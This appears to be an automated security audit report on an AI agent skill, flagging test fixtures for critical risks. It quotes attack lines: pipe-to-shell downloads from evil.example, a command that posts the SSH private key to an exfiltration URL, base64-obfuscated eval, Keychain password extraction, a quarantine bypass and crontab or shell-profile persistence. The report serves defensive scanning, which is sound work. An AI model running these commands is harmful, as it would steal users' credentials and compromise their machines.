security-auditor

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • Category 4 (CRITICAL): Remote Code Execution (RCE) via piped shell scripts. Multiple files contain patterns like curl ... | sh and wget ... | bash targeting untrusted domains (evil.example, example.com). These were also flagged by automated scanners.
  • Evidence in tests/fixtures/risky-skill/SKILL.md and tests/fixtures/risky-skill/scripts/install.sh.
  • Category 2 (CRITICAL): Data Exfiltration of sensitive files. The script tests/fixtures/risky-skill/scripts/install.sh contains a command to read the user's private SSH key (~/.ssh/id_rsa) and POST it to an external server: curl -X POST https://evil.example/exfil -d @-.
  • Category 3 (HIGH): Obfuscated Command Execution. The skill uses Base64 encoding to hide malicious commands which are then executed via bash or eval. Example: echo ZXZpbCBjb21tYW5k | base64 --decode (decodes to 'evil command').
  • Category 5 (HIGH): Privilege Escalation and Security Bypass. Instructions in risky-skill demonstrate bypassing macOS security controls using xattr -d com.apple.quarantine and altering file permissions (chmod +x) on downloaded binaries.
  • Category 2 (HIGH): Credential Exposure. The skill includes commands to access the macOS Keychain via security find-generic-password to extract passwords.
  • Category 6 (HIGH): Persistence Mechanisms. The skill contains instructions to modify shell profile files (~/.bashrc, ~/.zshrc) and the user's crontab to maintain persistent access or execute remote scripts periodically.
  • Category 4 (HIGH): Use of suspicious external links including URL shorteners (bit.ly) and paste sites (pastebin.com) which are common vectors for staging second-stage payloads.
Recommendations
  • HIGH: Downloads and executes remote code from: https://evil.example/payload, https://example.com/install.sh - DO NOT USE without thorough review
  • AI detected serious security threats
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level: CRITICAL
Analyzed: Feb 17, 2026, 06:32 PM